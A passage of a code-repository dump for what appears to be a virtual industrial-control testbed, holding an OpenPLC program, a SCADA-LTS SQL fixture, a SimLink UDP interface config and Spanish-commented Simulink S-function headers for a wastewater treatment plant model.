END_PROGRAM 17 | 18 | 19 | CONFIGURATION Config0 20 | 21 | RESOURCE Res0 ON PLC 22 | TASK task0(INTERVAL := T#20ms,PRIORITY := 0); 23 | PROGRAM instance0 WITH task0 : My_Program; 24 | END_RESOURCE 25 | END_CONFIGURATION -------------------------------------------------------------------------------- /scada-lts/background.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/scada-lts/background.png -------------------------------------------------------------------------------- /scada-lts/dockerfile: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/scada-lts/dockerfile -------------------------------------------------------------------------------- /scada-lts/process_sample/background.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/scada-lts/process_sample/background.png -------------------------------------------------------------------------------- /scada-lts/scripts/scripts-one-insert.txt: -------------------------------------------------------------------------------- 1 | INSERT INTO scripts (userId, xid, name, script, data) VALUES 2 | ((SELECT id FROM users WHERE username='admin'), 'SC_290169', '', '', (SELECT sc.data FROM scripts sc LIMIT 1)), 3 | ((SELECT id FROM users WHERE username='admin'), 'SC_256909', '', '', (SELECT sc.data FROM scripts sc LIMIT 1)), 4 | ((SELECT id FROM users WHERE username='admin'), 'SC_831503', '', '', (SELECT sc.data FROM scripts sc LIMIT 1)), 5 | ((SELECT id FROM users WHERE username='admin'), 'SC_586810', '', '', (SELECT sc.data FROM scripts sc LIMIT 1)), 6 | ((SELECT id FROM users WHERE username='admin'), 'SC_290170', '', '', (SELECT sc.data FROM scripts sc LIMIT 1)), 7 | ((SELECT id FROM users WHERE username='admin'), 'SC_256910', '', '', (SELECT sc.data FROM scripts sc LIMIT 1)), 8 | ((SELECT id FROM users WHERE username='admin'), 'SC_831504', '', '', (SELECT sc.data FROM scripts sc LIMIT 1)), 9 | ((SELECT id FROM users WHERE username='admin'), 'SC_586811', '', '', (SELECT sc.data FROM scripts sc LIMIT 1)), 10 | ((SELECT id FROM users WHERE username='admin'), 'SC_290171', '', '', (SELECT sc.data FROM scripts sc LIMIT 1)), 11 | ((SELECT id FROM users WHERE username='admin'), 'SC_256911', '', '', (SELECT sc.data FROM scripts sc LIMIT 1)), 12 | ((SELECT id FROM users WHERE username='admin'), 'SC_831505', '', '', (SELECT sc.data FROM scripts sc LIMIT 1)), 13 | ((SELECT id FROM users WHERE username='admin'), 'SC_586812', '', '', (SELECT sc.data FROM scripts sc LIMIT 1)); -------------------------------------------------------------------------------- /wwtp/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM sflorenz05/matlab_simulink:v0.3 2 | ADD /simulink /home/matlab/Documents/MATLAB/simulink 3 | -------------------------------------------------------------------------------- /wwtp/interface_simLink/interface.cfg: -------------------------------------------------------------------------------- 1 | # Interface configuration file for SimLink - 2017 2 | # 3 | # This is the configuration file for the SimLink Interface program 4 | # used in conjunction with the OpenPLC and the Simulink application. 5 | # In order to send and receive data between the Simulink and the 6 | # OpenPLC stations, SimLink needs to know the IP address for the 7 | # machine running the Simulink application and also information 8 | # about the exported variables for each OpenPLC station. 9 | # 10 | # To add variables to one station, type the name of the station 11 | # followed by the command "add" plus the type of variable you 12 | # want to be added. The number after the "=" sign is the UDP 13 | # port used by the simulink UDP connection to send or receive 14 | # the variable. Ex: station0.add(digital_out) = "10001" 15 | # 16 | # The variables added to the station will be connected to the 17 | # OpenPLC buffer in the order they appear. Therefore, the first 18 | # digital_out will be connected to OpenPLC %QX0.0 (coils buffer 19 | # at position 0.0). The second digital_out will be %QX0.1 and so on... 20 | # 21 | # Different types of variables (digital_out, analog_in) are 22 | # connected to different buffers. Therefore if after the two 23 | # digital_out's mentioned above there is a analog_in, it will 24 | # be connected to %IW0 (analog input buffer position 0) 25 | 26 | num_stations = "1" 27 | comm_delay = "100" 28 | 29 | # ------------ 30 | # SIMULINK 31 | # ------------ 32 | simulink.ip = "localhost" 33 | 34 | # ------------ 35 | # STATION 0 36 | # ------------ 37 | station0.ip = "localhost" 38 | station0.add(analog_in) = "10001" 39 | station0.add(analog_in) = "10002" 40 | station0.add(analog_in) = "10003" 41 | station0.add(analog_in) = "10004" 42 | station0.add(analog_in) = "10005" 43 | station0.add(analog_in) = "10006" 44 | station0.add(analog_in) = "10007" 45 | station0.add(analog_in) = "10008" 46 | station0.add(analog_in) = "10009" 47 | station0.add(analog_in) = "10010" 48 | station0.add(analog_in) = "10011" 49 | station0.add(analog_in) = "10012" 50 | #station0.add(analog_out) = "10013" 51 | #station0.add(analog_out) = "10014" 52 | #station0.add(analog_out) = "10015" 53 | 54 | -------------------------------------------------------------------------------- /wwtp/interface_simLink/test/interface.cfg: -------------------------------------------------------------------------------- 1 | # Interface configuration file for SimLink - 2017 2 | # 3 | # This is the configuration file for the SimLink Interface program 4 | # used in conjunction with the OpenPLC and the Simulink application. 5 | # In order to send and receive data between the Simulink and the 6 | # OpenPLC stations, SimLink needs to know the IP address for the 7 | # machine running the Simulink application and also information 8 | # about the exported variables for each OpenPLC station. 9 | # 10 | # To add variables to one station, type the name of the station 11 | # followed by the command "add" plus the type of variable you 12 | # want to be added. The number after the "=" sign is the UDP 13 | # port used by the simulink UDP connection to send or receive 14 | # the variable. Ex: station0.add(digital_out) = "10001" 15 | # 16 | # The variables added to the station will be connected to the 17 | # OpenPLC buffer in the order they appear. Therefore, the first 18 | # digital_out will be connected to OpenPLC %QX0.0 (coils buffer 19 | # at position 0.0). The second digital_out will be %QX0.1 and so on... 20 | # 21 | # Different types of variables (digital_out, analog_in) are 22 | # connected to different buffers. Therefore if after the two 23 | # digital_out's mentioned above there is a analog_in, it will 24 | # be connected to %IW0 (analog input buffer position 0) 25 | 26 | num_stations = "1" 27 | comm_delay = "100" 28 | 29 | # ------------ 30 | # SIMULINK 31 | # ------------ 32 | simulink.ip = "localhost" 33 | 34 | # ------------ 35 | # STATION 0 36 | # ------------ 37 | station0.ip = "localhost" 38 | station0.add(analog_in) = "10001" 39 | station0.add(analog_in) = "10002" 40 | station0.add(analog_in) = "10003" 41 | station0.add(analog_in) = "10004" 42 | station0.add(analog_in) = "10005" 43 | station0.add(analog_in) = "10006" 44 | station0.add(analog_in) = "10007" 45 | station0.add(analog_in) = "10008" 46 | 47 | 48 | station0.add(analog_out) = "50000" 49 | station0.add(analog_out) = "50001" 50 | station0.add(analog_out) = "50002" 51 | 52 | 53 | -------------------------------------------------------------------------------- /wwtp/interface_simLink/test/test.st: -------------------------------------------------------------------------------- 1 | 2 | PROGRAM My_Program 3 | VAR 4 | Temperatura_int AT %IW0 : INT := 9999; 5 | OxigenoDisuelto_int AT %IW1 : INT := 4; 6 | Amonio_int AT %IW2 : INT := 2; 7 | Nitrato_int AT %IW3 : INT := 1; 8 | Aireacion AT %QW0 : INT := 100; 9 | CaudalPurga AT %QW1 : INT := 106; 10 | CaudalRecInr AT %QW2 : INT := 5000; 11 | END_VAR 12 | VAR 13 | MOVE5_OUT : INT; 14 | END_VAR 15 | MOVE5_OUT := MOVE(Temperatura_int); 16 | 17 | 18 | END_PROGRAM 19 | 20 | 21 | CONFIGURATION Config0 22 | 23 | RESOURCE Res0 ON PLC 24 | TASK task0(INTERVAL := T#20ms,PRIORITY := 0); 25 | PROGRAM instance0 WITH task0 : My_Program; 26 | END_RESOURCE 27 | END_CONFIGURATION 28 | -------------------------------------------------------------------------------- /wwtp/interface_simLink/test/test_2022a.slx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/wwtp/interface_simLink/test/test_2022a.slx -------------------------------------------------------------------------------- /wwtp/simulink/.1742-6906-50e9-c555.tmp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/wwtp/simulink/.1742-6906-50e9-c555.tmp -------------------------------------------------------------------------------- /wwtp/simulink/.3ac2-26b6-5db3-e22c.tmp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/wwtp/simulink/.3ac2-26b6-5db3-e22c.tmp -------------------------------------------------------------------------------- /wwtp/simulink/.6f47-f7a4-8c25-8e1e.tmp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/wwtp/simulink/.6f47-f7a4-8c25-8e1e.tmp -------------------------------------------------------------------------------- /wwtp/simulink/.76f6-2c94-ffa5-2e44.tmp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/wwtp/simulink/.76f6-2c94-ffa5-2e44.tmp -------------------------------------------------------------------------------- /wwtp/simulink/.bbc9-d772-2b62-69d8.tmp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/wwtp/simulink/.bbc9-d772-2b62-69d8.tmp -------------------------------------------------------------------------------- /wwtp/simulink/Remedy_WWTP.slx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/wwtp/simulink/Remedy_WWTP.slx -------------------------------------------------------------------------------- /wwtp/simulink/Remedy_WWTP.slxc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/wwtp/simulink/Remedy_WWTP.slxc -------------------------------------------------------------------------------- /wwtp/simulink/Remedy_WWTP_all.slx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/wwtp/simulink/Remedy_WWTP_all.slx -------------------------------------------------------------------------------- /wwtp/simulink/Remedy_WWTP_old.slx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/wwtp/simulink/Remedy_WWTP_old.slx -------------------------------------------------------------------------------- /wwtp/simulink/implementacion_r2016a.slx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/wwtp/simulink/implementacion_r2016a.slx -------------------------------------------------------------------------------- /wwtp/simulink/implementacion_r2022a.slx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/wwtp/simulink/implementacion_r2022a.slx -------------------------------------------------------------------------------- /wwtp/simulink/implementacion_r2022a.slx.bak: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/wwtp/simulink/implementacion_r2022a.slx.bak -------------------------------------------------------------------------------- /wwtp/simulink/implementacion_simplified_2022a.slx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/wwtp/simulink/implementacion_simplified_2022a.slx -------------------------------------------------------------------------------- /wwtp/simulink/iniASM1model.m: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/wwtp/simulink/iniASM1model.m -------------------------------------------------------------------------------- /wwtp/simulink/iniASU_UNIT.m: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/wwtp/simulink/iniASU_UNIT.m -------------------------------------------------------------------------------- /wwtp/simulink/iniSETTLING_POINT.m: -------------------------------------------------------------------------------- 1 | 2 | % Variables de operacion 3 | Param_Settler_Fns(1)= 0.00; 4 | VarManip_QRF(1) = Inf_Const(2); 5 | -------------------------------------------------------------------------------- /wwtp/simulink/mex-functions/ASU Unit/ASU_UNIT.mexa64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/wwtp/simulink/mex-functions/ASU Unit/ASU_UNIT.mexa64 -------------------------------------------------------------------------------- /wwtp/simulink/mex-functions/ModN1.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/wwtp/simulink/mex-functions/ModN1.h -------------------------------------------------------------------------------- /wwtp/simulink/mex-functions/Settling Point/SETTLING_POINT.h: -------------------------------------------------------------------------------- 1 | 2 | 3 | // Parametros del modelo n� 1 4 | #include "../ModN1.h" 5 | 6 | // CARACTERISTICAS DE LA PLANTA 7 | #define NUMTANKS 1 8 | #define SETTLER 0 9 | 10 | 11 | #define NUMESTADOSCONTINUOS 0 12 | #define NUMESTADOSDISCRETOS 0 13 | 14 | 15 | // CARACTERISTICAS DEL BLOQUE 16 | // _____________________________________________________________________ 17 | 18 | #define NUMPUERTOSENTRADA 2 19 | #define IP_INFLUX 0 20 | #define IP_CONSIGNAS 1 21 | 22 | #define ANCHURAPUERTO1ENTRADA (1+NUMESTADOSMODASM1) // Caudal + concentraciones entrada D 23 | #define ANCHURAPUERTO2ENTRADA 1 // QRECF 24 | 25 | #define NUMPUERTOSSALIDA 3 26 | #define OP_SENSORES 0 27 | #define OP_OUTFLUX_EFF 1 28 | #define OP_OUTFLUX_REC 2 29 | 30 | #define ANCHURAPUERTO1SALIDA NUM_SENSORES // Sensores 31 | #define ANCHURAPUERTO2SALIDA (1+NUMESTADOSMODASM1) 32 | #define ANCHURAPUERTO3SALIDA (1+NUMESTADOSMODASM1) 33 | 34 | 35 | // _____________________________________________________________________ 36 | 37 | // PARAMETROS DE LA S-FUNCTION 38 | #define NUMPARAM_SFUNCT 2 39 | #define PARAM_ESTEQ(S) ssGetSFcnParam(S,0) 40 | #define PARAMS_SETTLER(S) ssGetSFcnParam(S,1) 41 | 42 | 43 | // Dimensiones de los Vectores de Parametros 44 | #define DIMPARAMESTEQ NUMCOEFESTEQ 45 | #define DIMPARAMS_SETTLER 1 46 | 47 | 48 | // _____________________________________________________________________ 49 | //////////////////////////////////////////////////////////////////////// 50 | // ASIGNACION DE VECTORES DE TRABAJO 51 | //////////////////////////////////////////////////////////////////////// 52 | // Vectores de TRABAJO 53 | #define NUMPWORKS 3 54 | #define PARAM_ESTEQUIOM ((real_T *)PWork[0]) 55 | #define PARAM_SETTL ((real_T *)PWork[1]) 56 | #define SENSORES ((real_T *)PWork[2]) 57 | 58 | 59 | // Par�metros 60 | #define F_NS ((real_T*)PWork[1])[0] 61 | 62 | #define NUM_SENSORES 4 63 | 64 | // Elementos del vector SENSORES 65 | #define SST_EFF Sensores[0] 66 | #define NH4_EFF Sensores[1] 67 | #define NO3_EFF Sensores[2] 68 | #define MLSS_RECF Sensores[3] 69 | 70 | // _____________________________________________________________________ 71 | 72 | // PUERTOS DE ENTRADAS 73 | #define Q_INF (*uPtrs0[0]) 74 | #define SS_INF (*uPtrs0[1]) 75 | #define SO_INF (*uPtrs0[2]) 76 | #define SI_INF (*uPtrs0[3]) 77 | #define SNO_INF (*uPtrs0[4]) 78 | #define SNH_INF (*uPtrs0[5]) 79 | #define SND_INF (*uPtrs0[6]) 80 | #define SALK_INF (*uPtrs0[7]) 81 | #define XI_INF (*uPtrs0[8]) 82 | #define XS_INF (*uPtrs0[9]) 83 | #define XBH_INF (*uPtrs0[10]) 84 | #define XBA_INF (*uPtrs0[11]) 85 | #define XP_INF (*uPtrs0[12]) 86 | #define XND_INF (*uPtrs0[13]) 87 | #define XIN_INF (*uPtrs0[14]) 88 | 89 | 90 | #define QRF_INP (*uPtrs1[0]) 91 | 92 | -------------------------------------------------------------------------------- /wwtp/simulink/mex-functions/Settling Point/SETTLING_POINT.mexa64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/wwtp/simulink/mex-functions/Settling Point/SETTLING_POINT.mexa64 -------------------------------------------------------------------------------- /wwtp/simulink/mex-functions/Three Combiner/THREE_COMBINER.asv: -------------------------------------------------------------------------------- 1 | 2 | 3 | // Parametros del modelo n� 1 4 | #include "../ModN1.h" 5 | 6 | // CARACTERISTICAS DEL BLOQUE 7 | // _____________________________________________________________________ 8 | 9 | #define NUMPUERTOSENTRADA 3 10 | #define IP_INFLUX1 0 11 | #define IP_INFLUX2 1 12 | #define IP_INFLUX3 2 13 | 14 | #define ANCHURAPUERTO1ENTRADA (1+NUMESTADOSMODASM1) // Caudal + concentraciones entrada1 15 | #define ANCHURAPUERTO2ENTRADA (1+NUMESTADOSMODASM1) // Caudal + concentraciones entrada2 16 | #define ANCHURAPUERTO3ENTRADA (1+NUMESTADOSMODASM1) // Caudal + concentraciones entrada2 17 | 18 | #define NUMPUERTOSSALIDA 1 19 | #define OP_OUTFLUX 0 20 | 21 | #define ANCHURAPUERTO1SALIDA (1+NUMESTADOSMODASM1) // Caudal + concentraciones salida 22 | 23 | 24 | // _____________________________________________________________________ 25 | 26 | 27 | // PUERTOS DE ENTRADAS 28 | #define Q_IN1 (*uPtrs0[0]) 29 | #define SS_IN1 (*uPtrs0[1]) 30 | #define SO_IN1 (*uPtrs0[2]) 31 | #define SI_IN1 (*uPtrs0[3]) 32 | #define SNO_IN1 (*uPtrs0[4]) 33 | #define SNH_IN1 (*uPtrs0[5]) 34 | #define SND_IN1 (*uPtrs0[6]) 35 | #define SALK_IN1 (*uPtrs0[7]) 36 | #define XI_IN1 (*uPtrs0[8]) 37 | #define XS_IN1 (*uPtrs0[9]) 38 | #define XBH_IN1 (*uPtrs0[10]) 39 | #define XBA_IN1 (*uPtrs0[11]) 40 | #define XP_IN1 (*uPtrs0[12]) 41 | #define XND_IN1 (*uPtrs0[13]) 42 | #define XIN_IN1 (*uPtrs0[14]) 43 | 44 | 45 | #define Q_IN2 (*uPtrs1[0]) 46 | #define SS_IN2 (*uPtrs1[1]) 47 | #define SO_IN2 (*uPtrs1[2]) 48 | #define SI_IN2 (*uPtrs1[3]) 49 | #define SNO_IN2 (*uPtrs1[4]) 50 | #define SNH_IN2 (*uPtrs1[5]) 51 | #define SND_IN2 (*uPtrs1[6]) 52 | #define SALK_IN2 (*uPtrs1[7]) 53 | #define XI_IN2 (*uPtrs1[8]) 54 | #define XS_IN2 (*uPtrs1[9]) 55 | #define XBH_IN2 (*uPtrs1[10]) 56 | #define XBA_IN2 (*uPtrs1[11]) 57 | #define XP_IN2 (*uPtrs1[12]) 58 | #define XND_IN2 (*uPtrs1[13]) 59 | #define XIN_IN2 (*uPtrs1[14]) 60 | 61 | 62 | #define Q_IN3 (*uPtrs2[0]) 63 | #define SS_IN3 (*uPtrs2[1]) 64 | #define SO_IN3 (*uPtrs2[2]) 65 | #define SI_IN3 (*uPtrs2[3]) 66 | #define SNO_IN3 (*uPtrs2[4]) 67 | #define SNH_IN3 (*uPtrs2[5]) 68 | #define SND_IN3 (*uPtrs2[6]) 69 | #define SALK_IN3 (*uPtrs2[7]) 70 | #define XI_IN3 (*uPtrs2[8]) 71 | #define XS_IN3 (*uPtrs2[9]) 72 | #define XBH_IN3 (*uPtrs2[10]) 73 | #define XBA_IN3 (*uPtrs2[11]) 74 | #define XP_IN3 (*uPtrs2[12]) 75 | #define XND_IN3 (*uPtrs2[13]) 76 | #define XIN_IN3 (*uPtrs2[14]) -------------------------------------------------------------------------------- /wwtp/simulink/mex-functions/Three Combiner/THREE_COMBINER.h: -------------------------------------------------------------------------------- 1 | 2 | 3 | // Parametros del modelo n� 1 4 | #include "../ModN1.h" 5 | 6 | // CARACTERISTICAS DEL BLOQUE 7 | // _____________________________________________________________________ 8 | 9 | #define NUMPUERTOSENTRADA 3 10 | #define IP_INFLUX1 0 11 | #define IP_INFLUX2 1 12 | #define IP_INFLUX3 2 13 | 14 | #define ANCHURAPUERTO1ENTRADA (1+NUMESTADOSMODASM1) // Caudal + concentraciones entrada1 15 | #define ANCHURAPUERTO2ENTRADA (1+NUMESTADOSMODASM1) // Caudal + concentraciones entrada2 16 | #define ANCHURAPUERTO3ENTRADA (1+NUMESTADOSMODASM1) // Caudal + concentraciones entrada2 17 | 18 | #define NUMPUERTOSSALIDA 1 19 | #define OP_OUTFLUX 0 20 | 21 | #define ANCHURAPUERTO1SALIDA (1+NUMESTADOSMODASM1) // Caudal + concentraciones salida 22 | 23 | 24 | // _____________________________________________________________________ 25 | 26 | 27 | // PUERTOS DE ENTRADAS 28 | #define Q_IN1 (*uPtrs0[0]) 29 | #define SS_IN1 (*uPtrs0[1]) 30 | #define SO_IN1 (*uPtrs0[2]) 31 | #define SI_IN1 (*uPtrs0[3]) 32 | #define SNO_IN1 (*uPtrs0[4]) 33 | #define SNH_IN1 (*uPtrs0[5]) 34 | #define SND_IN1 (*uPtrs0[6]) 35 | #define SALK_IN1 (*uPtrs0[7]) 36 | #define XI_IN1 (*uPtrs0[8]) 37 | #define XS_IN1 (*uPtrs0[9]) 38 | #define XBH_IN1 (*uPtrs0[10]) 39 | #define XBA_IN1 (*uPtrs0[11]) 40 | #define XP_IN1 (*uPtrs0[12]) 41 | #define XND_IN1 (*uPtrs0[13]) 42 | #define XIN_IN1 (*uPtrs0[14]) 43 | 44 | 45 | #define Q_IN2 (*uPtrs1[0]) 46 | #define SS_IN2 (*uPtrs1[1]) 47 | #define SO_IN2 (*uPtrs1[2]) 48 | #define SI_IN2 (*uPtrs1[3]) 49 | #define SNO_IN2 (*uPtrs1[4]) 50 | #define SNH_IN2 (*uPtrs1[5]) 51 | #define SND_IN2 (*uPtrs1[6]) 52 | #define SALK_IN2 (*uPtrs1[7]) 53 | #define XI_IN2 (*uPtrs1[8]) 54 | #define XS_IN2 (*uPtrs1[9]) 55 | #define XBH_IN2 (*uPtrs1[10]) 56 | #define XBA_IN2 (*uPtrs1[11]) 57 | #define XP_IN2 (*uPtrs1[12]) 58 | #define XND_IN2 (*uPtrs1[13]) 59 | #define XIN_IN2 (*uPtrs1[14]) 60 | 61 | 62 | #define Q_IN3 (*uPtrs2[0]) 63 | #define SS_IN3 (*uPtrs2[1]) 64 | #define SO_IN3 (*uPtrs2[2]) 65 | #define SI_IN3 (*uPtrs2[3]) 66 | #define SNO_IN3 (*uPtrs2[4]) 67 | #define SNH_IN3 (*uPtrs2[5]) 68 | #define SND_IN3 (*uPtrs2[6]) 69 | #define SALK_IN3 (*uPtrs2[7]) 70 | #define XI_IN3 (*uPtrs2[8]) 71 | #define XS_IN3 (*uPtrs2[9]) 72 | #define XBH_IN3 (*uPtrs2[10]) 73 | #define XBA_IN3 (*uPtrs2[11]) 74 | #define XP_IN3 (*uPtrs2[12]) 75 | #define XND_IN3 (*uPtrs2[13]) 76 | #define XIN_IN3 (*uPtrs2[14]) -------------------------------------------------------------------------------- /wwtp/simulink/mex-functions/Three Combiner/THREE_COMBINER.mexa64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/wwtp/simulink/mex-functions/Three Combiner/THREE_COMBINER.mexa64 -------------------------------------------------------------------------------- /wwtp/simulink/mex-functions/Two Absolute Splitter/TWO_ABS_SPLITTER.h: -------------------------------------------------------------------------------- 1 | 2 | 3 | // Parametros del modelo n� 1 4 | #include "../ModN1.h" 5 | 6 | // CARACTERISTICAS DEL BLOQUE 7 | // _____________________________________________________________________ 8 | 9 | #define NUMPUERTOSENTRADA 2 10 | #define IP_INFLUX 0 11 | #define IP_QOUT2 1 12 | 13 | #define ANCHURAPUERTO1ENTRADA (1+NUMESTADOSMODASM1) // Caudal + concentraciones entrada1 14 | #define ANCHURAPUERTO2ENTRADA 1 // Q2 15 | 16 | 17 | #define NUMPUERTOSSALIDA 2 18 | #define OP_OUTFLUX1 0 19 | #define OP_OUTFLUX2 1 20 | 21 | #define ANCHURAPUERTOS_SALIDA (1+NUMESTADOSMODASM1) // Caudal + concentraciones salida 22 | 23 | 24 | // _____________________________________________________________________ 25 | 26 | // PUERTOS DE ENTRADAS 27 | #define Q_IN (*uPtrs0[0]) 28 | #define SS_IN (*uPtrs0[1]) 29 | #define SO_IN (*uPtrs0[2]) 30 | #define SI_IN (*uPtrs0[3]) 31 | #define SNO_IN (*uPtrs0[4]) 32 | #define SNH_IN (*uPtrs0[5]) 33 | #define SND_IN (*uPtrs0[6]) 34 | #define SALK_IN (*uPtrs0[7]) 35 | #define XI_IN (*uPtrs0[8]) 36 | #define XS_IN (*uPtrs0[9]) 37 | #define XBH_IN (*uPtrs0[10]) 38 | #define XBA_IN (*uPtrs0[11]) 39 | #define XP_IN (*uPtrs0[12]) 40 | #define XND_IN (*uPtrs0[13]) 41 | #define XIN_IN (*uPtrs0[14]) 42 | 43 | 44 | #define Q_O2 (*uPtrs1[0]) 45 | 46 | 47 | -------------------------------------------------------------------------------- /wwtp/simulink/mex-functions/Two Absolute Splitter/TWO_ABS_SPLITTER.mexa64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/wwtp/simulink/mex-functions/Two Absolute Splitter/TWO_ABS_SPLITTER.mexa64 -------------------------------------------------------------------------------- /wwtp/simulink/mex-functions/Two Combiner/TWO_COMBINER.h: -------------------------------------------------------------------------------- 1 | 2 | 3 | // Parametros del modelo n� 1 4 | #include "../ModN1.h" 5 | 6 | // CARACTERISTICAS DEL BLOQUE 7 | // _____________________________________________________________________ 8 | 9 | #define NUMPUERTOSENTRADA 2 10 | #define IP_INFLUX1 0 11 | #define IP_INFLUX2 1 12 | 13 | #define ANCHURAPUERTO1ENTRADA (1+NUMESTADOSMODASM1) // Caudal + concentraciones entrada1 14 | #define ANCHURAPUERTO2ENTRADA (1+NUMESTADOSMODASM1) // Caudal + concentraciones entrada2 15 | 16 | 17 | #define NUMPUERTOSSALIDA 1 18 | #define OP_OUTFLUX 0 19 | 20 | #define ANCHURAPUERTO1SALIDA (1+NUMESTADOSMODASM1) // Caudal + concentraciones salida 21 | 22 | 23 | // _____________________________________________________________________ 24 | 25 | 26 | // PUERTOS DE ENTRADAS 27 | #define Q_IN1 (*uPtrs0[0]) 28 | #define SS_IN1 (*uPtrs0[1]) 29 | #define SO_IN1 (*uPtrs0[2]) 30 | #define SI_IN1 (*uPtrs0[3]) 31 | #define SNO_IN1 (*uPtrs0[4]) 32 | #define SNH_IN1 (*uPtrs0[5]) 33 | #define SND_IN1 (*uPtrs0[6]) 34 | #define SALK_IN1 (*uPtrs0[7]) 35 | #define XI_IN1 (*uPtrs0[8]) 36 | #define XS_IN1 (*uPtrs0[9]) 37 | #define XBH_IN1 (*uPtrs0[10]) 38 | #define XBA_IN1 (*uPtrs0[11]) 39 | #define XP_IN1 (*uPtrs0[12]) 40 | #define XND_IN1 (*uPtrs0[13]) 41 | #define XIN_IN1 (*uPtrs0[14]) 42 | 43 | 44 | #define Q_IN2 (*uPtrs1[0]) 45 | #define SS_IN2 (*uPtrs1[1]) 46 | #define SO_IN2 (*uPtrs1[2]) 47 | #define SI_IN2 (*uPtrs1[3]) 48 | #define SNO_IN2 (*uPtrs1[4]) 49 | #define SNH_IN2 (*uPtrs1[5]) 50 | #define SND_IN2 (*uPtrs1[6]) 51 | #define SALK_IN2 (*uPtrs1[7]) 52 | #define XI_IN2 (*uPtrs1[8]) 53 | #define XS_IN2 (*uPtrs1[9]) 54 | #define XBH_IN2 (*uPtrs1[10]) 55 | #define XBA_IN2 (*uPtrs1[11]) 56 | #define XP_IN2 (*uPtrs1[12]) 57 | #define XND_IN2 (*uPtrs1[13]) 58 | #define XIN_IN2 (*uPtrs1[14]) 59 | -------------------------------------------------------------------------------- /wwtp/simulink/mex-functions/Two Combiner/TWO_COMBINER.mexa64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/wwtp/simulink/mex-functions/Two Combiner/TWO_COMBINER.mexa64 -------------------------------------------------------------------------------- /wwtp/simulink/mex-functions/Two Relative Splitter/TWO_REL_SPLITTER.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/wwtp/simulink/mex-functions/Two Relative Splitter/TWO_REL_SPLITTER.c -------------------------------------------------------------------------------- /wwtp/simulink/mex-functions/Two Relative Splitter/TWO_REL_SPLITTER.h: -------------------------------------------------------------------------------- 1 | 2 | 3 | // Parametros del modelo n� 1 4 | #include "../ModN1.h" 5 | 6 | // CARACTERISTICAS DEL BLOQUE 7 | // _____________________________________________________________________ 8 | 9 | #define NUMPUERTOSENTRADA 1 10 | #define IP_INFLUX 0 11 | 12 | #define ANCHURAPUERTO1ENTRADA (1+NUMESTADOSMODASM1) // Caudal + concentraciones entrada1 13 | 14 | 15 | #define NUMPUERTOSSALIDA 2 16 | #define OP_OUTFLUX1 0 17 | #define OP_OUTFLUX2 1 18 | 19 | #define ANCHURAPUERTOS_SALIDA (1+NUMESTADOSMODASM1) // Caudal + concentraciones salida 20 | 21 | // PARAMETROS DE LA S-FUNCTION 22 | #define NUMPARAM_SFUNCT 1 23 | #define 